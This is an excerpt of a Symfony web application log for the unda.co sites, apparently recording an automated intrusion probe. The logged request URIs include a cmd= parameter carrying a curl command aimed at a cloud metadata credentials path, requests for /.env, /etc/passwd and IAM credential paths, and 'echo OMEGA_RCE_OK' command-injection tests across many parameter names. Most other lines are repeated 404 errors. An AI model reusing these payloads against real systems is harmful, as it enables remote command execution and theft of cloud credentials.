  1965. [2025-12-17 04:44:32] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/?cmd=curl%20-s%20http%3A%2F%2F100.100.100.200%2Flatest%2Fmeta-data%2Fram%2Fsecurity-credentials%2F","method":"GET"} []
  1966. [2025-12-17 04:44:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/cache"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/cache\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1967. [2025-12-17 04:44:32] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  1968. [2025-12-17 04:44:32] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  1969. [2025-12-17 04:44:32] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  1970. [2025-12-17 04:44:33] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  1971. [2025-12-17 04:44:33] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  1972. [2025-12-17 04:44:33] security.DEBUG: Calling Authentication entry point. [] []
  1973. [2025-12-17 04:44:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/cache"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/cache\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1974. [2025-12-17 04:44:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/decode"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/decode\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1975. [2025-12-17 04:44:33] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F%3Fcmd%3Dcurl%2520-s%2520http%253A%2F%2F100.100.100.200%2Flatest%2Fmeta-data%2Fram%2Fsecurity-credentials%2F","method":"GET"} []
  1976. [2025-12-17 04:44:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/decode"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/decode\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1977. [2025-12-17 04:44:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/decode"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/decode\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1978. [2025-12-17 04:44:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/decode"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/decode\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1979. [2025-12-17 04:44:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/decode"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/decode\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1980. [2025-12-17 04:44:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/cache"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/cache\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1981. [2025-12-17 04:44:34] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/decode"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/decode\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1982. [2025-12-17 04:44:34] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/decode"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/decode\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1983. [2025-12-17 04:44:34] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/decode"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/decode\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1984. [2025-12-17 04:44:34] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/decode"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/decode\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1985. [2025-12-17 04:44:34] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/decode"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/decode\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1986. [2025-12-17 04:44:34] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/cache"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/cache\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1987. [2025-12-17 04:44:34] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/session"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/session\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1988. [2025-12-17 04:44:34] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/session"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/session\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1989. [2025-12-17 04:44:34] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/session"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/session\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1990. [2025-12-17 04:44:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/session"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/session\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1991. [2025-12-17 04:44:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/session"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/session\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1992. [2025-12-17 04:44:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/decode"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/decode\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1993. [2025-12-17 04:44:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/session"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/session\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1994. [2025-12-17 04:44:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/session"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/session\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1995. [2025-12-17 04:44:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/session"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/session\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1996. [2025-12-17 04:44:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/session"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/session\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1997. [2025-12-17 04:44:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/session"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/session\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1998. [2025-12-17 04:44:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/decode"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/decode\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1999. [2025-12-17 04:44:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/session"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/session\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2000. [2025-12-17 04:44:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/session"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/session\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2001. [2025-12-17 04:44:45] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://www.unda.co/","method":"GET"} []
  2002. [2025-12-17 04:44:46] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /latest/meta-data/iam/security-credentials/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /latest/meta-data/iam/security-credentials/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2003. [2025-12-17 04:44:46] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2004. [2025-12-17 04:44:46] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /etc/passwd"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /etc/passwd\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2005. [2025-12-17 04:44:46] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://www.unda.co/","method":"POST"} []
  2006. [2025-12-17 04:44:46] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://www.unda.co/","method":"POST"} []
  2007. [2025-12-17 04:44:46] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://www.unda.co/","method":"POST"} []
  2008. [2025-12-17 04:44:46] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://www.unda.co/","method":"POST"} []
  2009. [2025-12-17 04:44:46] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://www.unda.co/","method":"POST"} []
  2010. [2025-12-17 04:44:46] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://www.unda.co/?cmd=echo%20OMEGA_RCE_OK","method":"GET"} []
  2011. [2025-12-17 04:44:47] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://www.unda.co/?exec=echo%20OMEGA_RCE_OK","method":"GET"} []
  2012. [2025-12-17 04:44:47] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://www.unda.co/?shell=echo%20OMEGA_RCE_OK","method":"GET"} []
  2013. [2025-12-17 04:44:47] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://www.unda.co/?0=echo%20OMEGA_RCE_OK","method":"GET"} []
  2014. [2025-12-17 04:44:47] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://www.unda.co/?c=echo%20OMEGA_RCE_OK","method":"GET"} []
  2015. [2025-12-17 04:44:47] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://www.unda.co/?run=echo%20OMEGA_RCE_OK","method":"GET"} []
  2016. [2025-12-17 04:44:47] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://www.unda.co/?do=echo%20OMEGA_RCE_OK","method":"GET"} []
  2017. [2025-12-17 04:44:47] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://www.unda.co/?command=echo%20OMEGA_RCE_OK","method":"GET"} []
  2018. [2025-12-17 04:44:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/cache"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/cache\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2019. [2025-12-17 04:44:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/cache"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/cache\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2020. [2025-12-17 04:44:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/decode"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/decode\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2021. [2025-12-17 04:44:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/decode"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/decode\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2022. [2025-12-17 04:44:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/session"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/session\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
